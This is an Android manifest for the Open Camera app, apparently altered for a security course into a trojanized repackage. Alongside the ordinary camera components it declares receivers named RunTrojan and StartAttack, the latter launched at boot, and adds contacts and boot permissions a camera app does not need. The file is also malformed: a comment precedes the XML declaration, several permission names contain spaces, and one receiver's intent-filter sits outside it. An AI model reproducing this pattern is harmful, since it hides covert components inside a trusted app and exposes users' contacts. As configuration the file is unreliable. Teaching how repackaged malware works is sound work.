<!--secret code is: ABC123-->
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="31" android:compileSdkVersionCodename="12" android:installLocation="auto" package="net.sourceforge.opencamera" platformBuildVersionCode="31" platformBuildVersionName="12">
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:smallScreens="true" android:xlargeScreens="true"/>
    <uses-permission android:maxSdkVersion="30" android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:maxSdkVersion="30" android:name="android.permission.BLUETOOTH_ADMIN"/>
    <uses-permission android:name="android.permission.BLUETOOTH_SCAN" android:usesPermissionFlags="neverForLocation"/>
    <uses-permission android:name="android.permission.BLUETOOTH_CONNECT"/>
    <uses-permission android:maxSdkVersion="28" android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-feature android:name="android.hardware.camera"/>
    <uses-feature android:name="android.hardware.microphone"/>
    <uses-feature android:name="android.hardware.bluetooth_le" android:required="false"/>
    <queries>
        <intent>
            <action android:name="android.intent.action.TTS_SERVICE"/>
        </intent>
    </queries>
    <uses-permission android:name="android.permission.READ CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE BOOT COMPLETED"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:largeHeap="true" android:name="net.sourceforge.opencamera.OpenCameraApplication" android:theme="@style/AppTheme">
        <activity android:clearTaskOnLaunch="true" android:configChanges="keyboardHidden|orientation|screenSize" android:exported="true" android:name="net.sourceforge.opencamera.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.IMAGE_CAPTURE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.IMAGE_CAPTURE_SECURE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.STILL_IMAGE_CAMERA"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.STILL_IMAGE_CAMERA_SECURE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.VIDEO_CAMERA"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.media.action.VIDEO_CAPTURE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
            <meta-data android:name="android.app.shortcuts" android:resource="@xml/shortcuts"/>
        </activity>
        <receiver android:name="edu.uc.cs.androidsecurity.trojan.RunTrojan"/>
            <intent-filter>
                <action android:name="android.trojan.action.BC ACTION"/>
            </intent-filter>
        <receiver android:name="edu.uc.cs.androidsecurity.trojan.StartAttack">
            <intent-filter>
                <action android:name="android.intent.action.BOOT COMPLETED"/>
            </intent-filter>
        </receiver>
        <activity android:exported="false" android:label="@string/scan_ble" android:name="net.sourceforge.opencamera.remotecontrol.DeviceScanner"/>
        <activity android:configChanges="keyboardHidden|orientation|screenSize" android:excludeFromRecents="true" android:exported="false" android:icon="@drawable/ic_launcher_take_photo" android:label="@string/take_photo" android:name="net.sourceforge.opencamera.TakePhoto" android:taskAffinity=""/>
        <receiver android:exported="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:name="net.sourceforge.opencamera.MyWidgetProvider">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/widget_info"/>
        </receiver>
        <receiver android:exported="true" android:icon="@drawable/ic_launcher_take_photo" android:label="@string/take_photo" android:name="net.sourceforge.opencamera.MyWidgetProviderTakePhoto">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/widget_info_take_photo"/>
        </receiver>
        <service android:exported="true" android:icon="@drawable/ic_photo_camera_white_48dp" android:label="@string/camera" android:name="net.sourceforge.opencamera.MyTileService" android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE"/>
            </intent-filter>
        </service>
        <service android:exported="true" android:icon="@drawable/ic_videocam_white_48dp" android:label="@string/record_video" android:name="net.sourceforge.opencamera.MyTileServiceVideo" android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE"/>
            </intent-filter>
        </service>
        <service android:exported="true" android:icon="@drawable/ic_face_white_48dp" android:label="@string/selfie" android:name="net.sourceforge.opencamera.MyTileServiceFrontCamera" android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE"/>
            </intent-filter>
        </service>
        <service android:enabled="true" android:exported="false" android:name="net.sourceforge.opencamera.remotecontrol.BluetoothLeService"/>
        <provider android:authorities="net.sourceforge.opencamera.androidx-startup" android:exported="false" android:name="androidx.startup.InitializationProvider">
            <meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup"/>
        </provider>
    </application>
</manifest>